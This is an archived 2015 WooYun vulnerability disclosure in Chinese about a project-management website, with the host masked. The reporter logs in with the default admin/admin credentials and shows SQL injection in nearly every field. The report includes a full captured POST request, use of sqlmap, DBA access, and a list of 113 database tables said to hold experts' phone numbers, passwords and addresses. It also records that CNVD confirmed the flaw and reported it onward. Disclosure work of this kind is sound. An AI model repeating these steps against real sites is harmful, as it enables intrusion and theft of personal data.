乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-09: 细节已通知厂商并且等待厂商处理中 2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-21: 细节向核心白帽子及相关领域专家公开 2015-10-01: 细节向普通白帽子公开 2015-10-11: 细节向实习白帽子公开 2015-10-26: 细节向公众公开
233333
URL:**.**.**.**/%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/Login.aspx用admin/admin登陆所有输入框几乎都有注入。。。。也是醉了。。。
就不一一列出来了
注入点太多只证明一个注入的数据,抓post包放入sqlmap
POST /%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/XBXM/XMListManager.aspx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/XBXM/XMListManager.aspxX-Forwarded-For: **.**.**.**Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 1282__VIEWSTATE=%2FwEPDwUKMTMyODY0NTA4Mw9kFgICAw9kFgYCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQV5ZWFycx4ORGF0YVZhbHVlRmllbGQFBXllYXJzHgtfIURhdGFCb3VuZGdkEBULBuWFqOmDqAQyMDE1BDIwMTQEMjAxMwQyMDEyBDIwMTEEMjAwOQQyMDA4BDIwMDcEMjAwNgQyMDA1FQsDYWxsBDIwMTUEMjAxNAQyMDEzBDIwMTIEMjAxMQQyMDA5BDIwMDgEMjAwNwQyMDA2BDIwMDUUKwMLZ2dnZ2dnZ2dnZ2dkZAIJDzwrAA0BAA8WBB8CZx4LXyFJdGVtQ291bnQCAWQWAmYPZBYCAgIPDxYCHgdWaXNpYmxlaGRkAg0PDxYEHg5DdXN0b21JbmZvVGV4dAV96K6w5b2V5oC75pWw77yaPGZvbnQgY29sb3I9ImJsYWNrIj4wPC9mb250PiDmgLvpobXmlbDvvJo8Zm9udCBjb2xvcj0iYmxhY2siPjE8L2ZvbnQ%2BIOW9k%2BWJjemhte%2B8mjxmb250IGNvbG9yPSJibGFjayI%2BMTwvZm9udD4eC1JlY29yZGNvdW50ZmRkGAEFBWdkdlhNDxQrAApkZGRkZGQVAQNQSUQUKwABFCsAATJmAAEAAAD%2F%2F%2F%2F%2FAQAAAAAAAAAEAQAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEICgIAAAAGAgAAAAALAgEUKwABMmYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAAH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAABERhdGEJVW5pdHlUeXBlDEFzc2VtYmx5TmFtZQEAAQgKAgAAAAYCAAAAAAtk0e8oSugqA4TDpriRNs8%2BkXA2PJY%3D&__EVENTVALIDATION=%2FwEWEQLTwK2rCQLmmee%2FCQL4wa6BDQL4wbLkBAL4wYbfAwL4weqyCwL4wf6VAgKT%2BPDRDgKT%2BMS0BgKT%2BOhdApP4%2FLAIApP4wOsHAv%2FBw40DAq%2FQlx0C%2F%2FDzmAYC%2FPDzmAYCu6uxhgjTs1eYRKV%2BpJ9s2Nrxlj2O55eRLw%3D%3D&ddlYear=all&txtXMName=123&ddlStatus=all&Button2=%E6%9F%A5%E8%AF%A2
DBA权限
8个库
当前数据库113个表
[113 tables]+-------------------------------+| 123 || ApplicationUnit || CompactList_View || Conceit || ConceitTime || Department || ExperUserMaster || ExperUserPaper || ExperUserResults || Function || HY_LoginExperUser || JDYJ_View || JD_Input || JD_Project_view || Location || PJExpertNew_View || PJExpert_View || PJ_Project_View || PJ_View || PingJiang_SCCS || PingJiang_View || PingJing_SCCS_View || PingShenView || Project || ProjectList_View || ProjectPeople || ProjectPeopleView || Project_SCCS || Project_SCCS_View || Project_expert || Project_ry || QUERY_PARA || Role || Role_Function || SB_Search_View || Sheet1$ || Users || VIEW1 || VIEW_zaiyan || ViewCompact || ViewCompact111111111 || ViewContract || ViewDepartment || ViewProject || ViewSPContract || View_CheckZJPS || View_Contract_JD || View_JianDing || View_ZJ || compact || compact_htxx || compact_xmid || config || dtproperties || expert || expertJob || expertcount || gather || ht_config || ht_jfys || ht_sbyq || ht_xm || ht_xmjdap || ht_xmry || huojiang || jianding || jiandingapply || jiandingexpert || jindubaogao || jindubaogao_Attitude || jindubaogao_AttitudeFile || jindubaogao_AttitudeFile_View || jindubaogao_Attitude_View || jindufujian || pingjiang || pingjiangTime || pingshenyijian || pj_Conceit || pj_config || pj_expertCount || pj_expertJob || pj_project_expert || projectView || project_conceit || project_rkx || project_temp || projectbak || sysdiagrams || tp3_jfys || tp3_sbyq || tp3_xm || tp3_xmDW || tp3_xmHXR || tp3_xmjdap || tp3_xmry || tp3_xmtzze || tp4_jfys || tp4_xm || tp4_xmry || tp4_xmry_xmqk || tp5_XM || tp5_xmhjqk || tp5_xmwcdw || tp5_xmzywcr || v_contract || v_project || v_user_dept || viewjianding || viewjiandingapply || viewjindu || xiangmulist || xm_pingjiang || zaiyan |+-------------------------------+
专家的手机,用户名,密码,住址等等信息
由于跑数据太慢就跑个几个用户名密码证明下
过滤
危害等级:高
漏洞Rank:12
确认时间:2015-09-11 14:35
CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置。同时同步上报给国家上级信息安全协调机构。
暂无